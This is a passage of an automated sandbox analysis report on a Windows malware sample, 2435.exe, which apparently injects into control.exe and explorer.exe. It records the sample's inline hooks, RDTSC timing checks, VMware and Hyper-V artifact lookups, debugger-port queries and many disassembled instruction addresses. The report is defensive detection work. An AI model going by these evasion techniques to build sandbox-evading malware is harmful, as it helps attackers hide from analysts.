          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041E560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ACD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0478D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCF6C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCF0B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCF02 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCE560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exeFile created: C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE2
          Source: C:\Users\user\Desktop\2435.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\2435.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2435.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002FB98E4 second address: 0000000002FB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002FB9B5E second address: 0000000002FB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2435.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4424Thread sleep time: -58000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6936Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.251588245.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.240720085.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.266735293.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.253512969.0000000008CA8000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Module--
          Source: explorer.exe, 00000002.00000000.252071585.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.245792621.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.252071585.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\2435.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\2435.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B223E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48B58 mov eax, dword ptr fs:[00000030h]
